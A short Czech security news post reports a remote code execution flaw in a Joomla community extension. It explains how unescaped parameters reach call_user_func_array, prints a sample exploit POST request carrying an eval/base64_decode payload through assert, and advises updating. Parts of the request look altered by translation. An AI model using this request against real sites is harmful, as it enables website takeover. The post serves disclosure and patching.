Nalezena Remote Code Execution zranitelnost v jednom z rozšíření pro Joomlu
Autor: ScheRas | 12.2.2014 |
Rozšíření je v současné době uvedeno na seznamu zranitelných pluginů. Tato chyba je hojně zneužívána a několik desítek uživatelů již hlásilo, že jim někdo naboural webové stránky.
Chyba se nachází v kontroleru "photos". Parametry zpracovávané pluginem 'Azrul' nejsou řádně escapované a jsou rovnou předány funkci call_user_func_array. To umožňuje útočníkovi zavolat libovolnou statickou třídu s použitím libovolného množství parametrů. Nebo použít CStringHelper::escape a pak spustit libovolný PHP kód.
Platný požadavek by tedy mohl vypadat nějak takto:
- POST / index.php HTTP/1.0
- Host: example.com
- ...
- option = community &
- no_html = 1 &
- task = azrul_ajax &
- func = fotky, ajaxUploadAvatar &
- TOKEN = 1 &
- arg2 = ["_D_", "Event"] a
- arg3 = ["_D_", "374"] a
- arg4=["_d_","%7B%22call%22%3A%5B%22CStringHelper%22%2C%22escape%22%2C%20%22%40exit%28%40eval%28%40base64_decode%28%27ZWNobyAnSGVsbG8gV29ybGQnOw%3D%3D%27%29%29%29%3B%22%2C%22assert%22%5D%7D"]
Všem administrátorům používajícím toto rozšíření se doporučuje aktualizovat na nejnovější verzi 3.1.0.4.
.Přihlášení | ||
| |||
.Infobox Nejnovější:
Články:
BugTrack: HackForum: Další služby: Na SOOM.cz je:
Článků: 991
Komentářů: 14 249 Aktualit: 1 861 Souborů: 151 WebForum: 49 236 Hardware: 38 Diskuze: 20 069 BugTrack: 4 413 Reg. uživatelů: 15 653 A proběhlo:
Zobraz. článků: 16 923 300
Staženo souborů: 1 342 423 Staženo dat: 862 623 MB Přístupy (hits): 189 074 060 | ||
| ||||
| |||
| |||
| |||
| ||||
| ||||
| ||||
| ||||
| ||||||||||||||||||||||||
